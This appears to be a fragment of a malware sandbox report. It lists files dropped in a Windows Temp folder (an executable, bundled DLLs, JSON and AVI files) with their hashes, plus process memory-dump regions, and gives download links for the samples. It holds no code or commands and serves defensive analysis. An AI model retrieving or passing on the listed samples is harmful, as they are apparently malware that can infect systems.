              0b0d37376212668f54332e0cfb9d7d33a98bcf44a725664e1e7dd383b65f41af49a9d516a5ec4cd2c63a6c2dc822fab13a2bef01bd92a2050d2f4bfd417b5cd6

              Download Submit

            • C:\Windows\Temp\{E5F65D12-58D0-4DE3-81AF-2019BCA8F247}\.cr\Y87Oyyz.exe
              Filesize

              5.6MB

              MD5

              958c9e0114b96e568a2cc7f44fed29d8

              SHA1

              bfe95d84a6243da42e0e0e89a7c6a5e87ce96487

              SHA256

              935aac20de79946cbcd537f5c15f166449bb218bd41f01f8130ff1b795421d8a

              SHA512

              8ed92a2f09cca8364727a9f057f7fcc42986d696b6c4e77b2695c0694b05046c92679cb13ba8926aeabf59afbbdd28b0075554cab487d5cf883bde6815c6d592

              Download Submit

            • C:\Windows\Temp\{F4639808-A1BB-4E5D-BA1D-5B385D04BD38}\.ba\Centre.dll
              Filesize

              650KB

              MD5

              682f74b9221d299109a3d668d6c49613

              SHA1

              93b98dbe3fbe1830f9de24d1c36ebc7d7da3738b

              SHA256

              f4ffce0b075ea7f473e6c8f04688b3abc0df5bf56e3ff4497fece42ab714d3b5

              SHA512

              d2995305a2452363932491f25dc0a51a1d2daf2f62d1feb3290958604981dd2a6f77c88d9ea7215d188f1e6898b9c6ed1686c1a2437b84be38a9282c325c8d8f

              Download Submit

            • C:\Windows\Temp\{F4639808-A1BB-4E5D-BA1D-5B385D04BD38}\.ba\DuiLib_u.dll
              Filesize

              860KB

              MD5

              83495e5db2654bcec3948ee486424599

              SHA1

              8a86af21864f565567cc4cc1f021f08b2e9febaa

              SHA256

              e770be8fba337cc01e24c7f059368526a804d2af64136a39bb84adeebcf9cfbc

              SHA512

              b4dbdfff0501fb3ba912556a25a64da38d3872bc31c94cc2395d6567b786cbbe104fd6178f019f8efba08dc5abcd964616a99d886b74aa80014b1c09ba7e9c41

              Download Submit

            • C:\Windows\Temp\{F4639808-A1BB-4E5D-BA1D-5B385D04BD38}\.ba\MSVCP140.dll
              Filesize

              437KB

              MD5

              e9f00dd8746712610706cbeffd8df0bd

              SHA1

              5004d98c89a40ebf35f51407553e38e5ca16fb98

              SHA256

              4cb882621a3d1c6283570447f842801b396db1b3dcd2e01c2f7002efd66a0a97

              SHA512

              4d1ce1fc92cea60859b27ca95ca1d1a7c2bec4e2356f87659a69bab9c1befa7a94a2c64669cef1c9dadf9d38ab77e836fe69acdda0f95fa1b32cba9e8c6bb554

              Download Submit

            • C:\Windows\Temp\{F4639808-A1BB-4E5D-BA1D-5B385D04BD38}\.ba\SplashWin.exe
              Filesize

              446KB

              MD5

              4d20b83562eec3660e45027ad56fb444

              SHA1

              ff6134c34500a8f8e5881e6a34263e5796f83667

              SHA256

              c5e650b331fa5292872fdaede3a75c8167a0f1280ce0cd3d58b880d23854bdb1

              SHA512

              718bd66fcff80b8008a4523d88bd726cdbc95e6e7bdb3f50e337e291294505ed54e6f5995d431968b85415e96f6f7ed37381ca021401ad57fda3b08a1f0c27f4

              Download Submit

            • C:\Windows\Temp\{F4639808-A1BB-4E5D-BA1D-5B385D04BD38}\.ba\VCRUNTIME140.dll
              Filesize

              74KB

              MD5

              a554e4f1addc0c2c4ebb93d66b790796

              SHA1

              9fbd1d222da47240db92cd6c50625eb0cf650f61

              SHA256

              e610cdac0a37147919032d0d723b967276c217ff06ea402f098696ab4112512a

              SHA512

              5f3253f071da3e0110def888682d255186f2e2a30a8480791c0cad74029420033b5c90f818ae845b5f041ee4005f6de174a687aca8f858371026423f017902cc

              Download Submit

            • C:\Windows\Temp\{F4639808-A1BB-4E5D-BA1D-5B385D04BD38}\.ba\diorama.json
              Filesize

              55KB

              MD5

              61947293abc79f5e003ac42d9b7489f4

              SHA1

              9386c10a6441a395385007130f1aa6916b22881a

              SHA256

              57414bda77d468f6573672aaa7b1b68e38ae511ab5be187c227232a054c257bb

              SHA512

              6c90d23c9ce0a3d2880c7e0bf056df32de9701ce5e3c210967e04a67c7730fc9b341ed46641390cd49a645c49c6c6ab7a63710df0814ae75cfb32d7fef43903f

              Download Submit

            • C:\Windows\Temp\{F4639808-A1BB-4E5D-BA1D-5B385D04BD38}\.ba\fizgig.avi
              Filesize

              4.4MB

              MD5

              5d66fb6cc0be6e19ce2ac0e06c46a8cc

              SHA1

              90aeb2f3c4ec474779d2c92d3880dcd4611c0ea8

              SHA256

              e5b81417ed9c35e57a92e739e1a64aedd83edb3cc759b6a18b1a637bcfc3b8f2

              SHA512

              1fb73e90adf0f20d6061135d01fa45674dbcd67791978a663911e69fa11ea93561328a93c8fe582b33cabb2096ad15cc9daa46eb4d07895a70134e1a5b81e68b

              Download Submit

            • memory/1060-320-0x00007FFB0F8D0000-0x00007FFB0FAC5000-memory.dmp

              Filesize

              2.0MB

              Download

            • memory/1080-23-0x0000000007AA0000-0x0000000007AC2000-memory.dmp

              Filesize

              136KB

              Download

            • memory/1080-5-0x0000000005EF0000-0x0000000005F56000-memory.dmp

              Filesize

              408KB

              Download

            • memory/1080-2-0x0000000005020000-0x0000000005056000-memory.dmp

              Filesize

              216KB

              Download

            • memory/1080-3-0x0000000005790000-0x0000000005DB8000-memory.dmp

              Filesize

              6.2MB

              Download

            • memory/1080-4-0x0000000005710000-0x0000000005732000-memory.dmp

              Filesize

              136KB

              Download

            • memory/1080-6-0x0000000005F60000-0x0000000005FC6000-memory.dmp

              Filesize

              408KB

              Download

            • memory/1080-16-0x00000000060E0000-0x0000000006434000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/1080-24-0x0000000008920000-0x0000000008EC4000-memory.dmp

              Filesize

              5.6MB

              Download

            • memory/1080-17-0x00000000065C0000-0x00000000065DE000-memory.dmp

              Filesize

              120KB

              Download

            • memory/1080-18-0x0000000006610000-0x000000000665C000-memory.dmp

              Filesize

              304KB

              Download

            • memory/1080-22-0x0000000007B10000-0x0000000007BA6000-memory.dmp

              Filesize

              600KB

              Download

            • memory/1080-19-0x0000000007CF0000-0x000000000836A000-memory.dmp

              Filesize

              6.5MB

              Download

            • memory/1080-20-0x0000000006AD0000-0x0000000006AEA000-memory.dmp

              Filesize

              104KB

              Download

            • memory/1108-144-0x0000000000660000-0x00000000006D0000-memory.dmp

              Filesize

              448KB

              Download

            • memory/1560-325-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/1656-47-0x0000000000B60000-0x000000000101D000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/1656-32-0x0000000000B60000-0x000000000101D000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/1840-126-0x0000000000B80000-0x000000000101B000-memory.dmp

              Filesize

              4.6MB

              Download

            • memory/1840-110-0x0000000000B80000-0x000000000101B000-memory.dmp

              Filesize

              4.6MB

              Download

            • memory/1840-103-0x0000000000B80000-0x000000000101B000-memory.dmp

              Filesize

              4.6MB

              Download

            • memory/1840-88-0x0000000000B80000-0x000000000101B000-memory.dmp

              Filesize

              4.6MB

              Download

            • memory/1868-199-0x0000000140000000-0x000000014000E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/1868-195-0x0000000140000000-0x000000014000E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/1868-196-0x0000000140000000-0x000000014000E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/1868-197-0x0000000140000000-0x000000014000E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/1868-198-0x0000000140000000-0x000000014000E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/1868-202-0x0000000140000000-0x000000014000E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2024-389-0x00000000004F0000-0x000000000099C000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/2340-203-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-205-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-215-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-204-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-208-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-210-0x0000000000F70000-0x0000000000F90000-memory.dmp

              Filesize

              128KB

              Download

            • memory/2340-207-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-211-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-212-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-214-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-213-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-206-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-209-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-327-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2340-328-0x0000000140000000-0x0000000140848000-memory.dmp

              Filesize

              8.3MB

              Download

            • memory/2580-372-0x0000000000B20000-0x000000000120E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/2580-360-0x0000000000B20000-0x000000000120E000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/2664-106-0x0000029369DD0000-0x0000029369F3A000-memory.dmp

              Filesize

              1.4MB

              Download

            • memory/2664-102-0x0000029351840000-0x0000029351862000-memory.dmp

              Filesize

              136KB

              Download

            • memory/2976-269-0x0000000072270000-0x00000000723EB000-memory.dmp

              Filesize

              1.5MB

              Download

            • memory/2976-270-0x00007FFB0F8D0000-0x00007FFB0FAC5000-memory.dmp

              Filesize

              2.0MB

              Download

            • memory/3240-337-0x0000000002EE0000-0x0000000002EE5000-memory.dmp

              Filesize

              20KB

              Download

            • memory/3492-108-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4124-217-0x0000000000400000-0x0000000000466000-memory.dmp

              Filesize

              408KB

              Download

            • memory/4124-219-0x0000000002D50000-0x0000000002D55000-memory.dmp

              Filesize

              20KB

              Download

            • memory/4124-218-0x0000000002D50000-0x0000000002D55000-memory.dmp

              Filesize

              20KB

              Download

            • memory/4124-148-0x0000000000400000-0x0000000000466000-memory.dmp

              Filesize

              408KB

              Download

            • memory/4124-146-0x0000000000400000-0x0000000000466000-memory.dmp

              Filesize

              408KB

              Download

            • memory/4424-73-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4424-319-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4424-46-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4424-257-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4424-109-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4424-68-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4424-69-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4424-224-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4424-216-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4424-326-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4424-70-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4424-149-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4424-90-0x0000000000120000-0x00000000005DD000-memory.dmp

              Filesize

              4.7MB

              Download

            • memory/4524-189-0x000001B1C3240000-0x000001B1C325A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/4524-183-0x000001B1C2FC0000-0x000001B1C2FDC000-memory.dmp

              Filesize

              112KB

              Download

            • memory/4524-186-0x000001B1C3200000-0x000001B1C321C000-memory.dmp

              Filesize

              112KB

              Download

            • memory/4524-192-0x000001B1C3230000-0x000001B1C323A000-memory.dmp

              Filesize

              40KB

              Download

            • memory/4524-191-0x000001B1C3220000-0x000001B1C3226000-memory.dmp

              Filesize

              24KB

              Download

            • memory/4524-190-0x000001B1C31F0000-0x000001B1C31F8000-memory.dmp

              Filesize

              32KB

              Download

            • memory/4524-187-0x000001B1C31E0000-0x000001B1C31EA000-memory.dmp

              Filesize

              40KB

              Download

            • memory/4524-184-0x000001B1C2FE0000-0x000001B1C3095000-memory.dmp

              Filesize

              724KB

              Download

            • memory/4524-185-0x000001B1C2C30000-0x000001B1C2C3A000-memory.dmp

              Filesize

              40KB

              Download

            • memory/4552-67-0x0000025E43760000-0x0000025E43770000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4552-188-0x0000025E5DA00000-0x0000025E5DAA8000-memory.dmp

              Filesize

              672KB

              Download

            • memory/4552-66-0x0000025E433C0000-0x0000025E433D2000-memory.dmp

              Filesize

              72KB

              Download

            • memory/4552-89-0x0000025E5DE30000-0x0000025E5E358000-memory.dmp

              Filesize

              5.2MB

              Download

            • memory/4736-290-0x00000000722F0000-0x000000007246B000-memory.dmp

              Filesize

              1.5MB

              Download

            • memory/4736-302-0x00000000722F0000-0x000000007246B000-memory.dmp

              Filesize

              1.5MB

              Download

            • memory/4736-291-0x00007FFB0F8D0000-0x00007FFB0FAC5000-memory.dmp

              Filesize

              2.0MB

              Download